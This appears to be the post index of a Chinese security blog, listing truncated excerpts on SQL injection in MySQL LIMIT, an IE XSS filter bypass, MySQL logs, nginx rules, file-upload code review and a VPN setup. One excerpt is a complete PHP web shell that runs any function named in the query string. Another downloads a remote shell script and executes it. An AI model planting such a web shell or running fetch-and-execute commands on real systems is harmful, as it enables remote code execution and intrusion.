SQL Injections in MySQL LIMIT clause

Jan 29,2015 in Web,安全研究 read (9236)

原文地址：https://rateip.com/blog/sql-injections-in-mysql-limit-clause/Countless number of articles was written on the exploitation of SQL Inj...

继续阅读

bypassing the ie xss filter

Jan 08,2015 in Web,安全研究 read (4963)

原文地址：http://www.thespanner.co.uk/2015/01/07/bypassing-the-ie-xss-filter/POC：http://challenge.hackvertor.co.uk/xss2.php?x=<input type=h...

继续阅读

Dec 15,2014 in Web read (7202)

mysql的日志主要有三种，分别是General Log、Slow Log、Error Log。每一个查询命令都会存储到General Log中，但是mysql默认情况下是关闭的。可以使用如下命令查看日志状态是否开启：show gloal variables like '%...

继续阅读

Nov 07,2014 in Web,安全研究 read (4527)

<?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c]));?>

继续阅读

Nov 03,2014 in Web read (4656)

location匹配命令~ #波浪线表示执行一个正则匹配，区分大小写~* #表示执行一个正则匹配，不区分大小写^~ #^~表示普通字符匹配，如果该选项匹配，只匹配该选项，不匹配别的选项，一般用来匹配目录= #进行普通字符精确匹配@ #...

继续阅读

Oct 20,2014 in Web,Code Review read (4233)

HTML:<form action="" method="post" enctype="multipart/form-data"><p>Pictures:<input type=&qu...

继续阅读

Oct 19,2014 in Web,安全研究,Code Review read (4665)

You'd better check $_FILES structure and values throughly.The following code cannot cause any errors absolutely.Example:<?phpheader('C...

继续阅读

Oct 11,2014 in Web read (5690)

听说有个一键安装包，不过我是没安装过。wget http://soft.kwx.gd/vpn/pptpd.shsh pptpd.sh下面手工一步一步安装吧检查服务器是否支持。第一个执行modprobe ppp-compress-18 && echo ok若显...

继续阅读

Oct 05,2014 in Web read (5290)

rewrite "^/([0-9a-zA-Z]{6})$" /index.php?do=code&urlKey=$1 last;rewrite "^/do/auth/(\w+?)(/domain/([\w\.]+?))?$" ...

继续阅读